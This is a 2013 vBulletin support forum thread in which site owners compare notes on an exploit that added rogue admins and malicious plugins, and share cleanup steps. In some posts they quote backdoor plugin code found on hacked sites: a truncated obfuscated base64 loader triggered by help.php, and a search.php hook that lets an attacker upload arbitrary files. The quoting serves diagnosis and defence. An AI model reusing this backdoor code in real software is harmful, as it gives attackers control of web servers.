Announcement

Collapse
No announcement yet.

A new type hack method?

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • #76
    Originally posted by Phat Phreddy View Post
    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    http://www.vbulletin.com/forum/forum...92#post3993992

    I see it so many times..... Too many times infact....
    But that is all I see......

    I have no htaccess things that I have done, I don't know how to do it. I have no hacks, no new admins, plugins, defacement issues. No intrusions whatsoever.
    I did remove the install folder at a very early stage in this recent exploit..

    Maybe I have been lucky so far? Maybe I just don't see what I am supposed to be looking for..? Maybe it will happen to me soon?

    There really is no finite explanation/solution here....


    Comment


    • #77
      Originally posted by Phat Phreddy View Post
      I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
      On my hacked forum, I found that they had uploaded some PHP shell scripts. If you don't remove those shell scripts, you could be in a world of hurt. Those shells can give them access to modify almost anything on your server - not just vBulletin. Here's everything I did to clean this up:
      • remove vBulletin install directory
      • change the admin password
      • change MySQL password
      • remove hacker admin accounts
      • remove uploaded shell scripts
      • remove hacker plugins
      • remove hacker language variables
      • remove hacker notices
      • remove hacker announcements
      • block IP ranges that accessed the upgrade.php file or shell scripts

      Comment


      • #78
        Shocked to find this thread.

        The late notification from VB gave no information at all, just 'delete install'. Given that I had no signs of a hack, I did it and moved on.

        I came across this thread tonight and yes, like everyone else I have new admin users. In my case they don't seem to have done anything, perhaps because my admincp is renamed and well protected. Fingers crossed. I still have some checking to do, but it's looking promising.

        Just in case any of the VB staff are still monitoring this, your response has been very poor. It would take minimal effort to add some detail to your exploit report, or send a second email once the level of detail in this thread became available. There are no doubt plenty of forum admins out there who are happily going about their business safe in the knowledge that the exploit was sorted and no damage done. And plenty of those will have some new administrators and plugins to keep them company.

        I have been teetering on the edge of jumping ship given the progress of VB5 and because VB4 seems to no longer be in development. VBSEO also in troubled water. The appalling response to this exploit, coupled with some pretty 'f*** you' type responses from the staff in the discussions of this make me really keen to get on and use that Xenforo license I bought a couple of months ago.

        Edit: to add something constructive to my whinge, I did what maybe a useful plugin check for others. I looked at the sequence of plugin IDs in the prefix_plugin table, ordering by the id descending. Then I looked at the next auto_increment id and make sure that there isn't a gap between the last known, trusted plugin created and the next ID. If there is a gap, then there is a chance that something has been created and then deleted. Get the auto_increment id using:

        SELECT `AUTO_INCREMENT` FROM information_schema.`TABLES` WHERE TABLE_SCHEMA = 'your_database' AND TABLE_NAME = 'yourprefix_plugin';

        I also checked the controlpanel log for gaps over the periods from registration to most recent activity of my new admin users. That would give an idea if something was done, then the log pruned.

        Edit 2: I do have an entry in my control panel log for a user called . , one of the new administrators. He accessed forum.php on 1 Sep and the action was 'modify'. However if I search for that or the email address given in my server logs, I can't find an entry. Can anyone shed any light on how that could be? Of any way of checking what the modify actually was?




        Last edited by hqarrse; Wed 11th Sep '13, 2:25pm.
        VB 4.1.9 on the Army Rumour Service
        VBSEO 3.6.0
        CentOS 5.6 / Slackware 12

        Comment


        • #79
          Originally posted by Jntu Hub View Post
          my site was hacked with new name
          I had him get on my site too, but no damage was done... because I always double bag it.

          NEVER EVER EVER EVER trust the security of vbulletin, wordpress, oscommerce, whatever, any software you install on your website. NEVER trust it. Always double up the admin login with .htaccesss password protection.

          I had admin accounts created on my website but, because I had password protected the admincp, they were never able to do anything. These aren't real hackers, they're script kiddies, they get a recipe off a black hat website and follow it. Double bagging might not stop a real determined hacker, but it'll stop these people.

          Another thing is to remove vbulletin's display of version information from public pages, which means they won't find your forum when they search for the specific version they have the exploit for.

          Someone may have mentioned these things already, I've not read the whole thread yet. But they bare repeating in anycase.

          Also yes, when an exploit is found, give more details, tell us what to look for.

          Comment


          • #80
            Removing your version number, won't really do much, there are still plenty of ways to find your site, so that is sort of moot.
            We only give enough information, so as to make sure you're aware of the exploit. Full Disclosure only helps the people who really want to attack you guys. Not our customers.

            Comment


            • #81
              Originally posted by Phat Phreddy View Post


              I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
              See http://www.vbulletin.com/forum/forum...47#post3994147
              Psychlinks Mental Health Support Forum
              Local Search Forum

              Comment


              • #82
                Please check admincp/help.php, by clicking the "?" somewhere in the admin control panel. I've downloaded yesterday the 4.2.x version and it shows up a very bad page!
                I noticed a plugin change with the following code:

                if (strpos($_SERVER['PHP_SELF'],"help.php")) {
                if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260) ;$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T 0......

                It seems that when accessing the HELP page, the plugin starts up some bad code.



                Click image for larger version

Name:	exploit.jpg
Views:	16
Size:	86.0 KB
ID:	3994957
                Last edited by TheMax74; Sat 14th Sep '13, 2:07am.

                Comment


                • TheMax74
                  TheMax74 commented
                  Editing a comment
                  Note: i had no /install directory before the hack!

                • TheLastSuperman
                  TheLastSuperman commented
                  Editing a comment
                  Going through a site now with files that contained the code above you posted along with an non-base_64 coded version in the plugin manager titled Skimlinks_vb with contents:

                  PHP Code:
                  if (strpos($_SERVER['PHP_SELF'],"search.php")) {
                  // vBulletin Security admincp
                  if (!empty($_REQUEST['vbsearchdo'])){
                  echo 
                  '';
                  echo 
                  '';
                  if( 
                  $_POST['_upl'] == "Upload" ) {
                  if(@
                  copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '
                  Good Upload'
                  ; }
                  else { echo 
                  'Upload Failed '; }}}

                  So that allows file uploads, check for shell scripts (the one you posted image of is a very bad shell script read more here - http://www.derekfountain.org/security_c99madshell.php because by accessing your help.php page the hacker was able to let the c99 madshell interact with your site.

                • TheLastSuperman
                  TheLastSuperman commented
                  Editing a comment
                  Also adding to my above comment, the /install/ directory was already removed from the site in question.

              • #83
                Originally posted by Zachery View Post
                Please read the following two blog posts:
                http://www.vbulletin.com/forum/blogs...ve-been-hacked

                http://www.vbulletin.com/forum/blogs...vbulletin-site

                Also please see these recent security announcements:

                vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
                vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions
                That is just great - I own my forum, but I do not know how to do that. Is VB going to cover the cost for me to pay my IT guy to do this for me? This is the 11th and I did not here anything about this until I* was hacked. I can't even access my site at this point. I own 7 VB sites - should I expect the other 6 to be trashed too????

                How do I remove this?? vbulletin-forumhome.js File not recognized as part of vBulletin
                I use my vbulletin forum to help auto repossession companies realize great profits. Kudos to Vbulletin - I love it so much I just bought a second 4.0 version!

                Comment


                • vbull fan
                  vbull fan commented
                  Editing a comment
                  My hacker registered as r00t and now when I try to go to my site it just says Access denied.
              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...
              X